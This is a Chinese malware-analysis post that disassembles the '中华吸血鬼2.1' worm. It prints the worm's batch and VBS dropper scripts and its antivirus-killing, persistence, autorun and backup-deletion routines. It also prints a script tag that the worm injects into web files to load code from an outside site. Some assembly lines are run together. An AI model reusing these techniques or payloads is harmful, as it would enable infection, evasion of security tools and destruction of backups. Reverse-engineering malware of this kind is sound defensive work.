
news/2024/10/17 14:16:25/


“中华吸血鬼”是个蠕虫病毒,病毒通过U盘、局域网弱密码猜解、网页挂马、dll劫持等方式传播。该病毒会在%systemroot%/Tasks/ 中释放多个病毒文件,通过修改注册表键值实现开机自动启动,为了躲避杀毒软件查杀,该病毒还会关闭破坏多种主流杀毒软件和安全工具,并且会屏蔽常见安全网站。病毒会每隔360000ms下载一次新病毒到本地运行,达到其不断更新的目的,还会删除Windows目录中help下的所有文件,电脑一旦感染此病毒,可能会给系统带来很大安全威胁。带着学习和过招的态度,我找到了吸血鬼2.1病毒样本,并对它探个究竟。



00405FF8    call 00402E20

00402E20    push    ebx
00402E21    push    esi
00402E22    push    edi
00402E23    push    00401F14 ;中华吸血鬼2.1
00402E28    xor     esi, esi
00402E2A    push    1
00402E2C    push    esi      
00402E2D    call    dword ptr [<&KERNEL32.CreateMute>; \CreateMutexA
然后病毒调用RegDeleteKeyA函数删除注册表键SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK},如下:

00402E4F    push ebp
00402E50    push 00401EA8                         ; /Subkey = "SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"
00402E55    push 80000001                         ; |hKey = HKEY_CURRENT_USER
00402E5A    call dword ptr [<&ADVAPI32.RegDeleteK>; \RegDeleteKeyA


00403290    mov     esi, 00401FF0                    ;  ASCII "360tray.exe"
00403295    lea     edi, dword ptr [ebp-20]         
00403298    mov     dword ptr [ebp-C], eax
0040329B    mov     eax, dword ptr [402000]
004032A0    push    0                                ; /ProcessID = 0
004032A2    movs    dword ptr es:[edi], dword ptr [e>; |
004032A3    mov     dword ptr [ebp-8], eax           ; |
004032A6    mov     eax, dword ptr [401FE8]          ; |
004032AB    movs    dword ptr es:[edi], dword ptr [e>; |
004032AC    mov     dword ptr [ebp-14], eax          ; |
004032AF    mov     eax, dword ptr [401FEC]          ; |
004032B4    push    2                                ; |Flags = TH32CS_SNAPPROCESS
004032B6    mov     dword ptr [ebp-10], eax          ; |
004032B9    movs    dword ptr es:[edi], dword ptr [e>; |
004032BA    call    <jmp.&KERNEL32.CreateToolhelp32S>; \CreateToolhelp32Snapshot得到快照句柄后,调用Process32First和Process32Next函数遍历进程:
004032CE    mov     edi, eax
004032D0    push    edi                              ; /lppe
004032D1    push    dword ptr [ebp-4]                ; |hSnapshot
004032D4    mov     dword ptr [edi], esi             ; |
004032D6    call    <jmp.&KERNEL32.Process32First>   ; \Process32First
004032DB    push    edi                              ; /lppe
004032DC    push    dword ptr [ebp-4]                ; |hSnapshot
004032DF    call    <jmp.&KERNEL32.Process32Next>    ; \Process32Next将得到的进程名与360tray.exe、ast.exe、AST.exe进行比较,当匹配时调用TerminateProcess来结束程序。


00403134    push    esi                                          ; /BufSize => 104 (260.)
00403135    push    eax                                          ; |Buffer
00403136    call    dword ptr [<&KERNEL32.GetWindowsDirectoryA>] ; \GetWindowsDirectoryA
0040313C    lea     eax, dword ptr [ebp-30C]
00403142    push    esi                                          ; /BufSize => 104 (260.)
00403143    push    eax                                          ; |PathBuffer
00403144    push    0                                            ; |hModule = NULL
00403146    call    dword ptr [<&KERNEL32.GetModuleFileNameA>]   ; \GetModuleFileNameA之后执行一个子函数调用00403043,功能是将病毒文件内容写入到csrss.exe中
00403043    push    ebp
0040304E    push    00401F90                    ; /mode = "rb"
00403053    push    dword ptr [ebp+8]           ; |path = "C:\Documents and Settings\li\中华吸血鬼2.2\unpacked.exe"
00403056    call    <jmp.&MSVCRT.fopen>         ; \fopen
0040305B    mov     esi, eax
0040305D    pop     ecx
0040305    test    esi, esi
00403060    pop     ecx
00403061    je      short 004030B2
00403063    push    00401F8C                    ; /mode = "wb"
00403068    push    dword ptr [ebp+C]           ; |path = "C:\WINDOWS\Tasks\csrss.exe"
0040306B    call    <jmp.&MSVCRT.fopen>         ; \fopen
00403070    mov     ebx, eax
00403072    pop     ecx
00403073    test    ebx, ebx
00403075    pop     ecx
00403076    je      short 004030B2
00403078    test    byte ptr [esi+C], 10
0040307C    push    esi                        ; /stream=MSVCT.77C2FCE0
0040307D    jnz     short 004030A5             ; |
0040307F    push    1                          ; |n = 1
00403081    lea     eax, dword ptr [ebp-104]   ; |eax=00EEF778
00403087    push    1                          ; |size = 1
00403089    push    eax                        ; |ptr
0040308A    call    <jmp.&MSVCRT.fread>        ; \fread
0040308F    push    ebx                        ; /stream
00403090    push    1                          ; |n = 1
00403092    lea     eax, dword ptr [ebp-104]   ; |
00403098    push    1                          ; |size = 1
0040309A    push    eax                        ; |ptr
0040309B    call    <jmp.&MSVCRT.fwrite>       ; \fwrite
004030A0    add     esp, 20
004030A3    jmp     short 00403078
004030A5    call    <jmp.&MSVCRT.fclose>        ; \fclose
004030AA    push    ebx                         ; /stream
004030AB    call    <jmp.&MSVCRT.fclose>        ; \fclose得到系统目录路径后,向目录中创建killme.bat批处理,写入信息,
00403212    push    00401FBC                    ; /mode = "w"
00403217    push    00401FC4                    ; |path = "c:\killme.bat"
0040321C    call    <jmp.&MSVCRT.fopen>         ; \fopen
00403221    mov     esi, eax
00403223    lea     eax, dword ptr [ebp-410]
00403229    push    eax                         ; /<%s>
0040322A    lea     eax, dword ptr [ebp-30C]    ; |
00403230    push    eax                         ; |<%s>
00403231    lea     eax, dword ptr [ebp-71C]    ; |
00403237    push    00401F94                    ; |format = "ipconfig",CR,LF,"del ""%s""",CR,LF,"start %s",CR,LF,"del %%0"
0040323C    push    eax                         ; |s
0040323D    call    <jmp.&MSVCRT.sprintf>       ; \sprintf
00403242    lea     eax, dword ptr [ebp-71C]
00403248    push    esi                         ; /stream
00403249    push    eax                         ; |s
0040324A    call    <jmp.&MSVCRT.fputs>         ; \fputs
0040324F    push    esi                         ; /stream
00403250    call    <jmp.&MSVCRT.fclose>        ; \fcloseKillme.bat内容:
del "C:\Documents and Settings\li\桌面\中华吸血鬼2.2\unpacked.exe"
start C:\WINDOWS\Tasks\csrss.exe
del %0


004033FA    push    eax                              ; /pPoint  存取坐标的结构体
004033FB    call    dword ptr [<&USER32.GetCursorPos>; \GetCursorPos
00403401    push    dword ptr [ebp-8]                ; /pt.Y
00403404    push    dword ptr [ebp-C]                ; |pt.X
00403407    call    dword ptr [<&USER32.WindowFromPo>; \WindowFromPoint接下来调用GetWindowTextA函数来获取窗口标题
00403447    push    104                                          ; /Count = 104 (260.)
0040344    push    eax                                          ; |Buffer
0040344D    push    edi                                          ; |hWnd
0040344E    call    dword ptr [<&USER32.GetWindowTextA>]         ; \GetWindowTextA如果桌面上窗口标题是: 杀毒、worm、卡巴斯基、超级巡警、江民、金山、Anti、
00403490    push    004021E0                         ; /s2 = "NOD32"
00403495    push    eax                              ; |s1
00403496    call    <jmp.&MSVCRT.strstr>             ; \strstr如果是就结束掉,结束不掉的话一直弹出一个警告知道这些软件被关掉
004037CE    push    eax                              ; /<%s>
004037C    lea     eax, dword ptr [ebp-110]         ; |
004037D5    push    eax                              ; |<%s>
004037D6    lea     eax, dword ptr [ebp-318]         ; |
004037DC    push    00402014                         ; |format = 安全提示:您正在使用的%s%s是盗版软件,可能您是盗版软件的受害者,为了给用户提供保证,我们无法继续给您提供服务,请到指定销售商店购买我们的正版软件,如果有任何疑问,请到我们微软主页查看http://www.microsoft.com004037E1    push    eax                              ; |s
004037E2    call    <jmp.&MSVCRT.sprintf>            ; \sprintf
004037E7    add     esp, 10
004037EA    lea     eax, dword ptr [ebp-318]
004037F0    push    10                               ; /Style = MB_OK|MB_ICONHAND|MB_APPLMODAL
004037F2    push    00402004                         ; |Title = "windows盗版验证"
004037F7    push    eax                              ; |Text
004037F8    push    ebx                              ; |hOwner
004037F9    call    dword ptr [<&USER32.MessageBoxA>>; \MessageBoxA


00405E43    call    esi                              ; [GetForegroundWindow;返回前台窗口的句柄
00405E45    push    dword ptr [ebp+C]                ; /Title = "";窗口标题
00405E48    xor     ebx, ebx                         ; |
00405E4A    mov     edi, eax                         ; |保存窗口句柄
00405E4C    push    dword ptr [ebp+8]                ; |Class = "AfxControlBar42s";指定类名
00405E4F    push    ebx                              ; |hAfterWnd => NULL;子窗口句柄
00405E50    push    edi                              ; |hParent;父窗口句柄
00405E51    call    dword ptr [<&USER32.FindWindowEx>; \FindWindowExA;获取一个窗口的句柄发现标题是跟冰刃有关的,就调用PostMessageA发送WM_CLOSE来结束冰刃。
00405E5B    push    ebx                                              ; /lParam => 0
00405E5C    push    ebx                                              ; |wParam => 0
00405E5D    push    10                                               ; |Message = WM_CLOSE
00405E5F    push    edi                                              ; |hWnd
00405E60    call    dword ptr [<&USER32.PostMessageA>]               ; \PostMessageA仅仅发送WM_CLOSE是不能结束掉冰刃的,冰刃会弹出一个是否结束冰刃的对话框。于是病毒就采用下面的方法来模拟按键Enter。
00405E9B    push    ebx                                              ; /ExtraInfo => 0
00405E9C    push    ebx                                              ; |Flags => 0
00405E9D    push    ebx                                              ; |ScanCode => 0
00405E9E    push    0D                                               ; |Key = VK_RETURN ;Enter键相关的击键值
00405EA0    call    dword ptr [<&USER32.keybd_event>]                ; \keybd_event该方法比较新颖,使用keybd_event模拟Enter键并结束掉冰刃,值得学习。


删除HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings键,SOFTWARE\Microsoft\ActiveSetup\InstalledComponents\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}键:
00405D1D    push    00402D1C                         ;  ASCII"SOFTWARE\Microsoft\Windows Script Host\Settings"
00405D22    rep     stos dword ptr es:[edi]
00405D24    push    esi  
00405D25    call    ebx                             ;  ADVAPI32.RegDeleteKeyA
00405D27    mov     edi, 00401EA8                    ;  ASCII "SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"
00405D2C    push    edi
00405D2D    push    80000001
00405D32    call    ebx                              ;  ADVAPI32.RegDeleteKeyA然后又创建[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}]键,指向<系统设置><%windir%\Tasks\hackshen.vbs>,
00405D37    push    eax                              ; /pHandle = 010EFFB0
00405D38    push    edi                              ; |Subkey = "SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"
00405D39    push    esi                              ; |hKey = HKEY_LOCAL_MACHINE
00405D3A    call    dword ptr [<&ADVAPI32.RegCreateK>; \RegCreateKeyA
00405D40    mov     edx, 00402D10
00405D45    or      ecx, FFFFFFFF
00405D48    mov     edi, edx
00405D4A    xor     eax, eax
00405D4C    repne   scas byte ptr es:[edi]
00405D4E    not     ecx
00405D50    dec     ecx
00405D51    push    ecx                              ; /Length=8
00405D52    push    edx                              ; |Value => "系统设置"
00405D53    push    1                                ; |ValueType = REG_SZ
00405D55    push    eax                              ; |Subkey => NULL
00405D56    push    dword ptr [ebp-4]                ; |hKey=64
00405D59    call    dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueA设置键值
00405D5F    lea     eax, dword ptr [ebp-104]
00405D65    push    eax                              ; /String
00405D66    call    dword ptr [<&KERNEL32.lstrlenA>] ; \lstrlenA
00405D6C    push    eax                              ; /BufSize=27
00405D6D    lea     eax, dword ptr [ebp-104]         ; |
00405D73    push    eax                              ; |Buffer= 	
00405D74    push    2                                ; |ValueType = REG_EXPAND_SZ
00405D76    push    0                                ; |Reserved = 0
00405D78    push    00402D04                         ; |ValueName = "stubpath"
00405D7D    push    dword ptr [ebp-4]                ; |hKey=64
00405D80    call    dword ptr [<&ADVAPI32.RegSetValu>; \RegSetValueExA
00405D86    push    dword ptr [ebp-4]                ; /hKey
00405D89    call    dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
00405D8F    lea     eax, dword ptr [ebp-208]
00405D95    push    104                              ; /BufSize = 104 (260.)
00405D9A    push    eax                              ; |Buffer
00405D9B    call    dword ptr [<&KERNEL32.GetWindows>; \GetWindowsDirectoryA获取系统目录
00405DA1    mov     edi, 00402CF0                    ;  ASCII "\Tasks\hackshen.vbs"
00405DA6    or      ecx, FFFFFFFF
00405DA9    xor     eax, eax                           ;清零,用于计算字符串长度
00405DAB    lea     edx, dword ptr [ebp-208]
00405DB1    repne   scas byte ptr es:[edi]                 ;扫描字符串知道匹配eax=0时停止
00405DB3    not     ecx                              ;得到字符串的长度
00405DB5    sub     edi, ecx
00405DB7    push    00401FBC                         ; /mode = "w"
00405DBC    mov     esi, edi                         ; |esi指向ASCII "\Tasks\hackshen.vbs"
00405DBE    mov     edi, edx                        ; |edi指向 ASCII"C:\Windows"
00405DC0    mov     edx, ecx                         ; |将字符串长度保存
00405DC2    or      ecx, FFFFFFFF                    ; |ecx=FFFFFFFF
00405DC5    repne   scas byte ptr es:[edi]           ; |扫描字符串知道匹配eax=0时停止
00405DC7    mov     ecx, edx                         ; |将字符串长度回写
00405DC9    dec     edi                              ; |
00405DCA    shr     ecx, 2                           ; |字符串长度除4
00405DCD    rep     movs dword ptr es:[edi], dword ptr es:[esi]>; |按双字将esi所指的内容移到edi所指的地址后,即将ASCII "\Tasks\hackshen.vbs"移到ASCII"C:\Windows"后
00405DCF    mov     ecx, edx                         ; |
00405DD1    lea     eax, dword ptr [ebp-208]         ; |
00405DD7    and     ecx, 3                           ; |ecx清零
00405DDA    push    eax                              ; |path = "C:\WINDOWS\Tasks\hackshen.vbs"
00405DDB    rep     movs byte ptr es:[edi], byte ptr>; |
00405DDD    call    <jmp.&MSVCRT.fopen>              ; \fopen
0405DE40    push    00402C8C                         ; /format = "On Error Resume Next",CR,LF,"Set rs=createObject(""Wscript.shell"")",CR,LF,"rs.run ""%%windir%%\Tasks\csrss.exe"",0"
00405DE9    lea     eax, dword ptr [ebp-30C]         ; |
00405DEF    push    eax                              ; |s
00405DF0    call    <jmp.&MSVCRT.sprintf>            ; \sprintf
00405DF5    lea     eax, dword ptr [ebp-30C]
00405DFB    push    esi                              ; /stream
00405DFC    push    eax                              ; |s
00405DFD    call    <jmp.&MSVCRT.fputs>              ; \fputs
00405E02    push    esi                              ; /stream
00405E03    call    <jmp.&MSVCRT.fclose>             ; \fclose
On Error Resume Next 
Set rs=createObject("Wscript.shell")
rs.run "%%windir%%\Tasks\csrss.exe"。


00403BC5    push    esi
00403BC6    xor     esi, esi
00403BC8    push    7D0                                       ; /Timeout = 2000. ms
00403BCD    call    dword ptr [<&KERNEL32.Sleep>]             ; \Sleep休眠两秒
00403BD3    push    esi                                       ; /pThreadId=NULL
00403BD4    push    esi                                       ; |CreationFlags=0
00403BD5    push    esi                                       ; |pThreadParm=NULL
00403BD6    push    00403B92                                  ; |ThreadFunction = unpacked.00403B92
00403BDB    push    esi                                       ; |StackSize=0
00403BDC    push    esi                                       ; |pSecurity=NULL
00403BDD    call    dword ptr [<&KERNEL32.CreateThread>]      ; \CreateThread创建一个线程
00403B92    push    00402204                                  ; /MutexName = "HDM"
00403B97    push    1                                         ; |InitialOwner = TRUE
00403B99    push    0                                         ; |pSecurity = NULL
00403B9B    call    dword ptr [<&KERNEL32.CreateMutexA>]      ; \CreateMutexA
00403BA1    call    dword ptr [<&KERNEL32.GetLastError>]      ; [GetLastError
00403BA7    cmp     eax, 0B7
00403BAC    jnz     short 00403BB3
00403BAE    xor     eax, eax
00403BB0    retn    4004039B5    push    ebx
004039B6    push    esi
004039B7    push    edi
004039B8    call    00403804      ;获取#32770类名的窗口句柄
004039BD    mov     esi, dword ptr [<&USER32.IsWindow>]   ;  USER32.IsWindow确定给定的窗口句柄是否标识一个已存在的窗口
004039C3    mov     edi, eax
004039C5    push    edi                                   ; /hWnd
004039C6    call    esi                                   ; \IsWindow
004039D0    push    edi
004039D1    call    00403900               ;列举子窗口
{00403900    push    5001100400403905    push    37E0040390A    push    dword ptr [esp+C]0040390E    call    004038CF{......004038EA    push    eax                                   ; /lParam004038EB    push    00403898                              ; |Callback = unpacked.00403898004038F0    push    dword ptr [ebp+8]                     ; |hParent004038F3    call    dword ptr [<&USER32.EnumChildWindows>>; \EnumChildWindows枚举一个父窗口的所有子窗口004038F9    mov     eax, dword ptr [406060]004038FE    leave004038FF    retn}00403913    add     esp, 0C00403916    retn
00403AF1    push    -1                                    ; /lParam = FFFFFFFF
00403AF3    mov     edi, 0B1                              ; |
00403AF8    push    ebx                                   ; |wParam
00403AF9    push    edi                                   ; |Message => EM_SETSEL
00403AFA    push    dword ptr [ebp-4]                     ; |hWnd
00403AFD    call    esi                                   ; \SendMessageA
00403B81    push    ebx                                   ; /lParam
00403B82    push    ebx                                   ; |wParam
00403B83    push    0C2                                   ; |Message = EM_REPLACESEL
00403B88    push    dword ptr [ebp-4]                     ; |hWnd
00403B8B    call    esi                                   ; \SendMessageA


00403FEF    push    eax                                          ; /Buffer = 012EFEB0
00403FF0    push    100                                          ; |BufSize = 100 (256.)
00403FF5    call    dword ptr [<&KERNEL32.GetLogicalDriveStrings>; \GetLogicalDriveStringsA
00403FFB    mov     ebx, eax          ;返回值保存到ebx,调用成功保存得到字符串的长度
00403FFD    xor     esi, esi             ;esi清零
00403FFF    test    ebx, ebx            ;测试返回值
00404001    jle     short 00404054        ;如果为0,即不成功,退出
00404003    mov     edi, dword ptr [<&KERNEL32.lstrc>;  kernel32.lstrcmpA
00404009    cmp     byte ptr [ebp+esi-104], 0       ;比较是否为空来得到驱动器盘符
00404011    jnz     short 0040404F
00404013    mov     al, byte ptr [ebp+esi-107]          ;将A赋值给al
0040401A    push    00402264                        ;  ASCII "A:"
0040401F    mov     byte ptr [ebp-4], al                ;将A保存
00404022    mov     al, byte ptr [ebp+esi-106]          ;将:赋值给al
00404029    mov     byte ptr [ebp-3], al                ;将:添加到A后
0040402C    lea     eax, dword ptr [ebp-4]              
0040402F    push    eax
00404030    call    edi                            ;lstrcmpA比较是否为A:
00404032    test    eax, eax                         ;测试返回值
00404034    je      short 0040404F                   ;是的话继续获取后面的驱动器盘符
00404036    lea     eax, dword ptr [ebp-4]             ;不是的话和C:进行比较
00404039    push    00402260                        ;  ASCII "C:"
0040403E    push    eax
0040403F    call    edi                             ;lstrcmpA
00404041    test    eax, eax                          ;测试返回值
00404043    je      short 0040404F                    ;相等的话继续获取后面的驱动器盘符
00404045    lea     eax, dword ptr [ebp-4]              ;不相等的话开始调用子函数
00404048    push    eax
00404049    call    00403C13
{   00403C13    push    ebp......   00403C33    push    dword ptr [ebp+8]                ; /String2=D:00403C36    mov     ebx, dword ptr [<&KERNEL32.lstrc>; |kernel32.lstrcpyA00403C3C    stos    word ptr es:[edi]                ; |00403C3E    stos    byte ptr es:[edi]                ; |00403C3F    lea     eax, dword ptr [ebp-34C]         ; |00403C45    push    eax                              ; |String100403C46    call    ebx                              ; \lstrcpyA00403C48    mov     esi, dword ptr [<&KERNEL32.lstrc>;  kernel32.lstrcatA00403C4E    lea     eax, dword ptr [ebp-34C]00403C54    push    0040224C                         ; /StringToAdd = "\*.*"   通配符00403C59    push    eax                              ; |ConcatString=D:00403C5A    call    esi                              ; \lstrcatA连接字符串......00403C62    push    eax                                          ; /pFindFileData00403C63    lea     eax, dword ptr [ebp-34C]                     ; |00403C69    push    eax                                          ; |FileName=D:\*.*00403C6A    call    dword ptr [<&KERNEL32.FindFirstFileA>]       ; \FindFirstFileA00403C70    cmp     eax, -100403C73    mov     dword ptr [ebp-4], eax00403C76    jnz     short 00403C7F00403C78    xor     eax, eax00403C7A    jmp     00403EC300403C7F    lea     ecx, dword ptr [ebp-248]00403C85    push    ecx                                          ; /pFindFileData00403C86    push    eax                                          ; |hFile00403C87    call    dword ptr [<&KERNEL32.FindNextFileA>]        ; \FindNextFileA其中调用403BE5和403BFC两个子函数,都是提取文件名后缀的函数,
00403BFC    mov     edx, dword ptr [esp+4]
00403C00    push    edi                              ;  lstrcmpA
00403C01    mov     edi, edx                         ;  D:\BOOTFONT.BIN
00403C03    or      ecx, FFFFFFFF                    ;ecx=FFFFFFFF
00403C06    xor     eax, eax                          ;eax清零
00403C08    repne   scas byte ptr es:[edi]                ;扫描字符串直到遇到空为止
00403C0A    not     ecx                             ;得到字符串的长度
00403C0C    dec     ecx
00403C0D    pop     edi                              ;lstrcmpA
00403C0E    lea     eax, dword ptr [ecx+edx-4]           ;.BIN
00403C12    retn如果后缀名是html,HTML,htm,HTM,asp,aspx,php,jsp的话,就写入"<script language=""javascript"" src=""http://www.liuliangvip.cn/down/index.htm""></script>",这样当每次打开这些文件时,会自动连接到http://www.liuliangvip.cn/down/index.htm这个网站。如果不是的话就检查后缀名是gho,GHO,Gho的文件,是的话就删除掉,使用户不能通过ghost文件来恢复系统,这招够毒的。


00404241   .  E8 18FEFFFF   call    0040405E
00404246   .  E8 DFFFFFFF   call    0040422A
0040424B   .  33C0          xor     eax, eax
0040424D   .  C2 0400       retn    4
0040405E  /$  68 04010000   push    104                              ; /BufSize = 104 (260.)
00404063  |.  68 0C764000   push    0040760C                         ; |PathBuffer = unpacked.0040760C
00404068  |.  6A 00         push    0                                ; |hModule = NULL
0040406A  |.  FF15 20104000 call    dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00404070  \.  C3            retn
0040422A  /$  E8 42FEFFFF   /call    00404071
0040422F  |.  85C0          |test    eax, eax
00404231  |.  75 0D         |jnz     short 00404240
00404233  |.  68 E8030000   |push    3E8                             ; /Timeout = 1000. ms
00404238  |.  FF15 AC104000 |call    dword ptr [<&KERNEL32.Sleep>]   ; \Sleep休眠1s
0040423E  |.^ EB EA         \jmp     short 0040422A
00404240  \>  C3            retn
004040BC  |.  53            |push    ebx                             ; /RootPathName=C:\
004040BD  |.  8BF7          |mov     esi, edi                        ; |
004040BF  |.  8BD1          |mov     edx, ecx                        ; |
004040C1  |.  8BFB          |mov     edi, ebx                        ; |
004040C3  |.  83C9 FF       |or      ecx, FFFFFFFF                   ; |
004040C6  |.  F2:AE         |repne   scas byte ptr es:[edi]          ; |
004040C8  |.  8BCA          |mov     ecx, edx                        ; |
004040CA  |.  4F            |dec     edi                             ; |
004040CB  |.  C1E9 02       |shr     ecx, 2                          ; |
004040CE  |.  F3:A5         |rep     movs dword ptr es:[edi], dword >; |
004040D0  |.  8BCA          |mov     ecx, edx                        ; |
004040D2  |.  83E1 03       |and     ecx, 3                          ; |
004040D5  |.  F3:A4         |rep     movs byte ptr es:[edi], byte pt>; |
004040D7  |.  FF15 50104000 |call    dword ptr [<&KERNEL32.GetDriveT>; \GetDriveTypeA获取盘符属性
004040DD  |.  83F8 02       |cmp     eax, 2               ;比较是否为可移动磁盘
004040E0      74 14         jne      short 004040F6       ;不是的话继续查看后面的盘符
004040E2  |.  33C0          |xor     eax, eax
004040E4  |.  50            |push    eax                             ; /pFileSystemNameSize => NULL
004040E5  |.  50            |push    eax                             ; |pFileSystemNameBuffer => NULL
004040E6  |.  50            |push    eax                             ; |pFileSystemFlags => NULL
004040E7  |.  50            |push    eax                             ; |pMaxFilenameLength => NULL
004040E8  |.  50            |push    eax                             ; |pVolumeSerialNumber => NULL
004040E9  |.  50            |push    eax                             ; |MaxVolumeNameSize => 0
004040EA  |.  50            |push    eax                             ; |VolumeNameBuffer => NULL
004040EB  |.  53            |push    ebx                             ; |RootPathName=C:\
004040EC  |.  FF15 4C104000 |call    dword ptr [<&KERNEL32.GetVolume>; \GetVolumeInformationA获取磁盘信息如果是可移动磁盘的话,又有00404164和004042E6两处跳转
0040416D  |.  6A 00         push    0                                ; /timer = NULL
0040416F  |.  E8 9A1D0000   call    <jmp.&MSVCRT.time>               ; \time
00404174  |.  50            push    eax                              ; /seed
00404175  |.  E8 8E1D0000   call    <jmp.&MSVCRT.srand>              ; \srand设置时间因子
0040417A  |.  8065 F4 00    and     byte ptr [ebp-C], 0
0040417E  |.  33C0          xor     eax, eax
00404180  |.  8D7D F5       lea     edi, dword ptr [ebp-B]
00404183  |.  59            pop     ecx
00404184  |.  AB            stos    dword ptr es:[edi]
00404185  |.  AB            stos    dword ptr es:[edi]
00404186  |.  59            pop     ecx
00404187  |.  33F6          xor     esi, esi
00404189  |.  66:AB         stos    word ptr es:[edi]
0040418B  |>  E8 721D0000   /call    <jmp.&MSVCRT.rand>              ; [rand产生随机数
00404190  |.  6A 3E         |push    3E
00404192  |.  33D2          |xor     edx, edx
00404194  |.  59            |pop     ecx
00404195  |.  F7F1          |div     ecx
00404197  |.  46            |inc     esi
00404198  |.  83FE 0A       |cmp     esi, 0A                            ;重复10次
0040419B  |.  8A82 902D4000 |mov     al, byte ptr [edx+402D90]
004041A1  |.  884435 F3     |mov     byte ptr [ebp+esi-D], al
004041A5  |.^ 7C E4         \jl      short 0040418B
004041F4  |.  53            push    ebx                              ; /FileName => "C:\autorun.inf"
004041F5  |.  FF15 A8104000 call    dword ptr [<&KERNEL32.GetFileAtt>; \GetFileAttributesA获取文件属性
004041FB  |.  83F8 10       cmp     eax, 10                        ;比较看是否是文件夹
004041FE  |.  75 0A         jnz     short 0040420A                  ;不是的话跳转,打开文件
00404200  |.  57            push    edi                              ; /NewName => "C:\FV5Jz39xs0"
00404201  |.  53            push    ebx                              ; |ExistingName => "C:\autorun.inf"
00404202  |.  FF15 5C104000 call    dword ptr [<&KERNEL32.MoveFileA>>; \MoveFileA是的话将文件名改成C:\FV5Jz39xs0
00404208  |.  EB 1B         jmp     short 00404225
0040420A  |>  E8 27FFFFFF   call    00404136
0040420F  |.  68 70224000   push    00402270                         ; /mode = "r"
00404214  |.  53            push    ebx                              ; |path
00404215  |.  E8 BE1C0000   call    <jmp.&MSVCRT.fopen>              ; \fopen
004042D9  |.  6A 07         push    7                                ; /FileAttributes = READONLY|HIDDEN|SYSTEM
004042DB  |.  53            push    ebx                              ; |FileName
004042DC  |.  FF15 58104000 call    dword ptr [<&KERNEL32.SetFileAtt>; \SetFileAttributesA设置成只读,隐藏,系统属性
004042E6  /$  81EC 04010000 sub     esp, 104
004042EC  |.  53            push    ebx
004042ED  |.  55            push    ebp
004042EE  |.  8B2D 44104000 mov     ebp, dword ptr [<&KERNEL32.lstrc>;  kernel32.lstrcatA
004042F4  |.  56            push    esi
004042F5  |.  57            push    edi
004042F6  |.  BB 64734000   mov     ebx, 00407364                    ;  ASCII "C:\"
004042FB  |.  68 30234000   push    00402330                         ; /StringToAdd = "recycle.{645FF040-5081-101B-9F08-00AA002F954E}"
00404300  |.  53            push    ebx                              ; |ConcatString => "C:\"
00404301  |.  FFD5          call    ebp                              ; \lstrcatA
00404303  |.  6A 00         push    0                                ; /pSecurity = NULL
00404305  |.  53            push    ebx                                                                   ; |Path => "C:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}"
00404306  |.  FF15 68104000 call    dword ptr [<&KERNEL32.CreateDire>; \CreateDirectoryA创建目录
0040430C  |.  8D4424 10     lea     eax, dword ptr [esp+10]
00404310  |.  53            push    ebx                              ; /String2 => "C:\"
00404311  |.  50            push    eax                              ; |String1
00404312  |.  FF15 2C104000 call    dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA
00404318  |.  8D4424 10     lea     eax, dword ptr [esp+10]
0040431C  |.  68 20234000   push    00402320                         ; /StringToAdd = "\中",BB,"?.//"
00404321  |.  50            push    eax                              ; |ConcatString
00404322  |.  FFD5          call    ebp                              ; \lstrcatA
00404324  |.  8BFB          mov     edi, ebx
00404326  |.  83C9 FF       or      ecx, FFFFFFFF
00404329  |.  33C0          xor     eax, eax
0040432B  |.  68 10234000   push    00402310                         ; /StringToAdd = "\GHOSTBAK.exe"
00404330  |.  F2:AE         repne   scas byte ptr es:[edi]           ; |
00404332  |.  F7D1          not     ecx                              ; |
00404334  |.  2BF9          sub     edi, ecx                         ; |
00404336  |.  B8 08754000   mov     eax, 00407508                    ; |
0040433B  |.  8BD1          mov     edx, ecx                         ; |
0040433D  |.  8BF7          mov     esi, edi                         ; |
0040433F  |.  8BF8          mov     edi, eax                         ; |
00404341  |.  50            push    eax                              ; |ConcatString => ""
00404342  |.  C1E9 02       shr     ecx, 2                           ; |
00404345  |.  F3:A5         rep     movs dword ptr es:[edi], dword p>; |
00404347  |.  8BCA          mov     ecx, edx                         ; |
00404349  |.  83E1 03       and     ecx, 3                           ; |
0040434C  |.  F3:A4         rep     movs byte ptr es:[edi], byte ptr>; |
0040434E  |.  FFD5          call    ebp                              ; \lstrcatA
00404350  |.  6A 00         push    0                                ; /FailIfExists = FALSE
00404352  |.  68 08754000   push    00407508                         ; |NewFileName = "C:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}\GHOSTBAK.exe"
00404357  |.  68 0C764000   push    0040760C                         ; |ExistingFileName = "C:\Documents and Settings\li\中华吸血鬼2.2\unpacked.exe"
0040435C  |.  FF15 64104000 call    dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA将病毒文件复制到该文件夹下,并改名
00404362  |.  6A 07         push    7                                ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00404364  |.  53            push    ebx                              ; |FileName = "C:\recycle.{645FF040-5081-101B-9F08-00AA002F954E}"
00404365  |.  FF15 58104000 call   dword ptr [<&KERNEL32.SetFileAtt>; \SetFileAttributesA设置文件夹属性为只读,隐藏,系统
0040436B  |.  8D4424 10     lea     eax, dword ptr [esp+10]
0040436F  |.  6A 00         push    0                                ; /pSecurity = NULL
00404371  |.  50            push    eax                              ; |Path
00404372  |.  FF15 68104000 call    dword ptr [<&KERNEL32.CreateDire>; \CreateDirectoryA
00404378  |.  5F            pop     edi
00404379  |.  5E            pop     esi
0040437A  |.  5D            pop     ebp
